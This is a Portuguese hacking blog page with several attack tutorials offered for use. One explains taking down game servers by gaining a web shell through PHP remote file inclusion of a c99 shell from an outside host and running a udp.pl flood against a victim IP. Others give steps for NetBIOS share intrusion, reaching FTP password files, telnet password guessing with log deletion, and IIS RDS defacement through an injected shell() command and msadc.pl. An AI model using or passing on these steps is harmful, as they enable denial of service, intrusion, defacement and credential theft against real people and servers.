download .....
O mundo é nosso!!!!!!!!!!!!!!!

Últimos comentários

oi

17/06/2010 @ 00:36:30
por helder


ou erique pelo amor de deus ...

24/05/2010 @ 19:38:07
por carlos da prepara


que porrra meu quero baixar o ...

24/05/2010 @ 19:36:58
por carlos da prepara


VAMOS NEGOCIAR PRA TU LIMPAR MEU ...

05/05/2010 @ 17:18:33
por JUNIOR


preciso do operador e senha, do ...

28/04/2010 @ 22:52:47
por eliane


Quem está conectado?

Membro: 0
Visitante: 1

Anúncio

rss Sindicação

Categorias

Escolha um tema



Links

    Palavras-chave (tags): "invasao"

    invasion servers ots lamers

    Para derrubar servidores inclusive como OT de tíbia, conexões de internet, vc deve primeiro obter uma Shell que vc tenha acesso liberado para fazer upload de um exploit de Denial of Service (DoS)
    Daí vc me pergunta oque é uma shell?
    Vamos lá! Uma shell no nosso caso seria um site vulnerável que vc pode invadir por exemplo por Php Injection daí obtendo a shell, vc vai lá em upload e faz upload do exploit na shell, daí depois só executar o ataque…
    Daí vc me pergunta como faço PHP Injection??
    Eu respondo que é melhor vc estudar pq os tutoriais do fórum invasão ou de outros lugares são quentíssimos, mas eu te dou uma dica…quando vc achar um site vulnerável (vc pode usar um scanner e axar sites vulneráveis, pesquise por “STRINGS” por exemplo: index.php?pag=) quando achar é só vc colocar uma CMD na frente do = por exemplo: http://www.sitevuln.com/index.php?pag=http://turkishdefacerteam.by.ru/c99.txt? nesse caso a CMD é essa: http://turkishdefacerteam.by.ru/c99.txt?
    Pronto! vc está dentro de sua shell!
    Daí faça oq eu falei, faça download do udp.pl (pode ser usados outros exploits como o f3) que tem em vários lugares como no site http://milw0rm.com/ (não esqueça de copiar e colar o exploit no bloco de notas e salvar como extensão .pl) daí vc faz upload do seu desse exploit do seu PC para a shell e executa o comando do ataque no campo da shell “Execute”
    Daí vc me pergunta e como executo esse ataque com o udp.pl?
    Fácil, dps que vc já tiver upado o udp.pl é só vc ir no campo “execute” da shell e executar o seguinte comando: perl udp.pl IP PORTA TAMANHO
    EXEMPLO de ataque: perl udp.pl 200.2.206.233 0 50000
    Ou seja…vc obtendo o IP do server de tibia ou o IP da vítima suponhamos que seja oq eu puis é só vc “mandar ver :wink: ” a porta no caso eu puis 0 como vc pode perceber, vc tbm pode colocar 0 pq é porta padrao e o exploit trabalha muito bem com a porta 0, porntanto use-a…o tamanho dos pacotes eu puis 50000 pode usar tbm 50000 já tah ótimo até demais!
    Pronto o server irá cair se fez tudo correto, aviso que não é fácil pq tem q obter a shell, mas está aí um mini tutorial muito bom que eu mesmo fiz nas coxas agora espero que tenha entendido um pouco mais, e não esqueça de agredecer a mim no seu tópico…
    Estude as partes que eu destaquei como: Shell, DoS (Denial of Service), PHP Injection, udp.pl, exploits em perl, CMD’s e strings!
    Meu video que fiz faz tempo eu derrubando um servidor de tibia muito bom veja meu tópico de video-aulas ela é a 4ª vídeo-aula veja: http://www.forum-invasao.com.br/novo/viewtopic.php?t=8545165
    Lembrando que todo conteúdo que vc não souber a respeito dos que eu falei nesse tutorial vc pode obter conhecimento procurando aqui no fórum ou no google.
    ₢ra¢ker · 72 vistos · 2 comentários
    Categorias: tutoriais
    03 Mar 2010

    invasao Nmap

      O Nmap é um portscan de uso geral, que pode ser usado, sempre que você precisar verificar rapidamente as portas abertas em determinado host, seja na sua rede local, seja na Internet. Ele permite detectar rapidamente portas abertas e outras informações sobre hosts da rede ou da internet.

     

          Esta nova versão do nmap vem com um frontend, o zenmap gui, que por sinal não me agradou, mas o command line continua o mesmo! =D

          

           Abaixo a descrição de alguns comandos básicos:

     Ping Sweeping 
    nmap -sP 192.168.0.1-254

    O nmap envia ICMP Echo Request e TCP ACK para os hosts que estão sendo scaneado (1 - 254). O host que responder será considerado pelo nmap como ativo.

    nmap –sP –PT80 192.168.0.24/24

    As vezes ping (ICMP) são bloqueados pelos roteadores/firewall, então para evitar isso pode–se usar a opção de enviar somente um ACK. O host que responder será considerado pelo nmap
    como ativo.

    TCP Scan
    nmap –sT 192.168.0.24

    Faz uma scan (varredura) a procura de portas TCP abertas. Esse método é facilmente detectado pela vitima.

    UDP Scanning
    nmap –sU 192.168.0.1

    Esse método é bastante usado para procurar brechas em portas abertas UDP tais como rpcinfo e Back Orifice. Um fator negativo dessa opção é a morosidade para obter as informações devido a maioria das maquinas Unix limitar o faixa de erros ICMP. Portanto, ao detectar esse faixa limite o próprio nmap diminui o envio de pacotes para não causar um overflow na vitima.

       Download do Nmap 4.76  http://nmap.org/dist/nmap-4.76-setup.exe

    ₢ra¢ker · 457 vistos · 2 comentários
    Categorias: softwares
    28 Abr 2009

    meios d invasao

    Tipos de Invasão!

    Invasao via Ip

    1º PASSO - Veja se você possui o programa NBTSTAT;
    2º PASSO - Vá ao PROMPT do DOS;
    3º PASSO - Digite: NBTSTAT -a (IP DO CARA);
    4º PASSO - Irá aparecer se o computador da pessoa tem compartilhamento dearquivos ou não. Se não tiver aparecerá HOST NOT FOUND.
    5º PASSO - Se aparecer mensagens entre esta marca <03>, você deverá pegaraquele arquivo.
    6º PASSO - Mapeie a sua unidade de disco para tornar as duas máquinas em umasó.
    7º PASSO - No Windows vá em INICIAR, EXECUTAR e digite "//IPdocara e dêOK.
    8º PASSO - Você invadiu por IP!!!!
    Mas, não se esqueça NUNCA apague nem modifique nada,
    apenas fusse e veja se encontra algo que lhe interessa e depois copie... OBs.:Alguns renomeiam o arquivo VNBT.386 no diretório windowssystem para nãoconseguirem te nukar ou te invadir...
    Conselho, renomeie-o também.






    Invasao via FTP

    Primeira coisa que deve saber...
    Não fique, em hipótese alguma mais de 5 mim,
    senão é cadeia na certa, á não ser que a conta seja RACKEADA.
    Siga os passos:
    1º PASSO - No DOS digite FTP;
    2º PASSO - Eu aconselho a digitar "?" para ver so comandos do FTP;
    3º PASSO - Digite "open". Irá aparecer a mensagem "TO';
    4º PASSO - Escolha um servidor de FTP (ftp.mandic.com.br, ftp.sol.com.br,ftp.plugnet.com.br, etc.);
    5º PASSO - Espere conectar e digite "quote cwd~root" ou "quotecwd~sys';
    6º PASSO - No PASSWORD coloque "quote pass ftp';
    7º PASSO - Você vai entrar no diretório home/root, dê um "cd/etc';
    8º PASSO - Pronto, você está no lugar certo, mas não se esqueça, as senhas sãocriptografadas, não adianta copiá-las, a não ser que tenha um programa paradescriptografá-las.
    OBs.: Alguns renomeiam o arquivo VNBT.386 no diretório windowssystem para nãoconseguirem te nukar ou te invadir... Conselho, renomeie-o também.







    INVASAO VIA TELNET...

    Ataque via Telnet é um dos poderosos, devido os comandos que a mesma aceita etambém suas tentativas de entrada não são registradas e você pode tentar quantotempo quiser (mas nunca exagere), mas também tem sua "parte mal",você geralmente "cai" dos servidores "lentos" e tambémdemora para enviar e receber os dígitos, por enquanto você digita ele demora umtempo para aparecer o que você digitou, ele não envia palavra por palavra, massim caracter por caracter, por isso a demora, mas mesmo assim, ele éfundamental para quem tá querendo alguma coisa boa...
    Vamos ao ataque:

    Entre na Home Page de algum servidor através de seu browser, e procure pelalista de home pages pessoais. Passando o mouse sobre os links que levam àpágina de cada usuário você pode perceber um padrão do tipo:
    http://www.servidor.com.br/~usuário
    Onde "usuário" é o login do dono da página. Se você usa o Windows 95vá ao prompt do MSDOS, digite telnet e tecle ENTER. Surgirá uma janela no Win95com o programa Telnet. Se você usa outro sistema operacional, inicie seuprograma de telnet. Conecte-se ao host do servidor (Ex:www.plisnet.com.br).Então entre com o Login de um dos usuários (olhando na lista de home pages) euse como senha esse mesmo login. Tente com todos os usuários. No final vocêdeverá ter algumas senhas. Se você quiser mais senhas de usuários, utilize alógica, relacionando a senha com o login (ex.: login: kurt senha: cobain).








    Invasao Via Porta 666

    Para invadir é fácil
    vc deve ter um programa de conexão via telenet (telnet que já vem com o WIN95ou similar)
    e também um programa chamado aabout.
    O q deve ser feito, este programa aabout deve ser acionado por ambas as partes(invasor e invadido)
    e o q ele faz??
    Bem, ele abre uma porta de conexão entre os dois CPUs via a porta 666.
    Vc deve ligar o telenet colocar no rost o numero do IP da pessoa
    e em port deve-se colocar 666. Bem vc já está conectado,
    dai no login vc deve digita cg! (com o "!")
    e dar um dir vendo tudo o q tem no CPU da outra pessoa








    Roubando senhas

    Cavalo de Tróia
    O hacker infiltra em seu alvo um programa semelhante a um vírus. Mas, em lugarde destruir programas e arquivos, ele tem a função de descobrir senhas. Ocavalo de Tróia pode ser enviado escondido numa mensagem na Internet ou numdisquete que o hacker passa, com jogos ou outros programs, para usuários docomputador que quer invadir. Cada vez que o usuário escreve nome e senha, ocavalo de Tróia grava os dados. Como é programado para se conectar com seucriador, por meio do modem, em dia e hora marcados, ele transmite os dados quecopiou. Elementar, para quem conhece muito bem as linguagens do computador.
    Farejamento de redes

    Para acelerar a sua transmissão, os dados que entram nas redes, provenientes devários computadores, são agrupados em pacotes. O hacker cria programas farejadores quemonitoram a circulação desses pacotes nas redes e procuram neles palavras comopassword e senha. Quando encontra, o programa copia o pacote e o envia para ocomputador do hacker. Os dados chegam dificados, mas isso não é problema paraele, que, em geral conhece bem criptografia, o conjunto de técnicas que permitecodificar dados.

    Engenharia social

    É uma espécie de espionagem. Senhas com datas de nascimento, sobrenome ou nomedos filhos são muito comuns. Se o hacker tiver acesso a essas informações dousuário, vai tentá-las, como primeira opção, para descobrir sua senha. Algunschegam a arrumar emprego temporário na empresa que pretendem invadir. Ládentro, prestam atenção nos computadores. Ninguém cobre o teclado na hora dedigitar a senha. Mesmo que tenha alguém por perto. Esse alguém pode ser umhacker.

    Quebra-cabeça

    Um jeito simples de desvendar senhas é a velha tentativa e erro. Para isso, ohacker cria programas capazes de montar todo tipo de combinação de letras enúmeros. O sistema funciona bem para senhas de até seis caracteres. O processodeve levar muito tempo, porque as tentativas precisam ser feitas em períodoscurtos, com grandes intervalos (dias, se for possível) entre um e outro, paranão despertar suspeitas. No Brasil é um método muito difundido, pois as senhasem geral são simples e dificilmente os computadores possuem sistema deproteção.

    Invasão do servidor

    O hacker pode se conectar via FTP anônimo ao servidor e baixar o arquivo quecontém as passwords (ex. passwd). Com esse arquivo em mãos o hacker podedescriptografá-lo usando programas específicos. Dessa forma ele obtémpraticamente (a descriptografação não é 100% eficiente) todas as passwordsdesse provedor.

    Dedução

    Um hacker pode usar a lógica para descobrir senhas de acesso. Ao invés de usaro quebra-cabeça que precisa testar milhares de combinações, o hacker faz atentativa e erro manualmente com as senhas mais prováveis. Para isso ele dispõede três dados fundamentais:

    1. Cerca de 1 em cada 30 usuários usa o login como senha.
    2. Muitos administradores usam a senha padrão do sistema.
    3. A maioria das senhas está relacionada ao login.
    Ex: login:kurt senha:cobain

    Mãos à obra!

    Chega de teorizar e vamos descobrir as senhas. Utilizaremos o último método porser ele o mais simples. O penúltimo método também é descrito detalhadamente noFAQ alt.2600.
    Entre na HomePage de algum servidor (experimente www.bhnet.com.br - bem fácil)e procure pela lista de homepages pessoais. Passando o mouse sobre os links quelevam à página de cada usuário você pode perceber um padrão do tipohttp://www.servidor.com.br/~usuário, onde usuário é o login do dono da página.Se você usa a bosta do Windows 95 vá ao prompt do MSDOS, digite telnet e tecleENTER. Surgirá uma janela no Win95 com o programa Telnet. Se você usa outrosistema operacional, inicie seu programa de telnet. A vantagem da conexão viatelnet é que suas tentativas de entrada não são registradas e você pode tentarquanto tempo quiser (mas nunca exagere). Conecte-se ao host do servidor(www.bhnet.com.br no nosso exemplo). Então entre com o Login de um dos usuários(olhando na lista de homepages) e use como senha esse mesmo login. Tente comtodos os usuários. No final você deverá ter algumas senhas. Se você quiser maissenhas de usuários, utilize a lógica, relacionando a senha com o login (ex:login:kurt senha:cobain). Agora vem o próximo e mais valioso passo. Tentarpegar a senha do administrador. Para isso consulte o FAQ do alt.2600 e descubraquais são as senhas padrões para o administrador em cada sistema. Novamenteusando telnet tente até achar ou desistir. Se você conseguir, vai ter acessototal ao servidor e terá hackeado o sistema! Mas cuidado ao usar a senha...você pode ser pego. Quando usar a senha do administrador, não esqueça de apagaros arquivos log ao sair. Veja o FAQ alt.2600 para saber o que são arquivos log,caso você não saiba.








    Invasao por RDS

    Obs.: Só funciona se o provedor usar Windows NT.
    Essa porra é usado pra hackear paginas , pra isso vc precisa saber a pasta quese encontra o index ou default, bom na maioria dos casos é só digitarwwww.servidor.com/idq.idq, ai aparece a bosta do diretorio!, geralmente éc:InetPubwwwroot , bom ai tem que descobrir se o servidor usaindex.asp,index.html,index.htm e mesma coisa com default.

    Bom exemplo, como faço? assim, www.servidor.com/idq.idq ou ida.ida ou idc.idc,bom ai vou ver o diretorio.. anoto num txt, agora só decobrir se é index oudefault e qual a extensão, bom só testando.. www.servidor.com/index.extençõespossiveis ; ou www.servidor.com/default.exetenções possiveis , bom qual entraré o certo ai é só anotar, vamos supor que o diretorio é :c:inetpubwwwrootindex.htm, ai depois de ter achado isso entra na tela do RDS,ou seja www.servidor.com/msadc/samples/adctest.asp, e vai aparecer a tela doRDS, agora apague tudo que tiver escrito no query e digite: Select * fromProducts where ProductType="|shell("cmd /c echo (O QUE QUER QUE APAREÇANO SEU HACKED) > c:InetPubwwwrootindex.htm")|" Depois é sóapertar RUN e pronto!, agora vamos se por que vc quer evitar tudo isso, é sopegar um exploit chamado msadc.pl e pronto.. vc usa assim: perl msadc.pl -hwww.servidor.com , se aparecer cmd , vc digita : (O que quer escrever) <C:InetPubwwwrootindex.htm (enter) só isso.

    para ver se o servidor tem o bug do RDS é testando com omsadc/samples/adctest.asp ou passando um scaneador de vulneralidades!

    (gosto do nessus pra linux),pega ele em www.nessus.org

    ₢ra¢ker · 1780 vistos · 8 comentários
    Categorias: tutoriais
    09 Abr 2009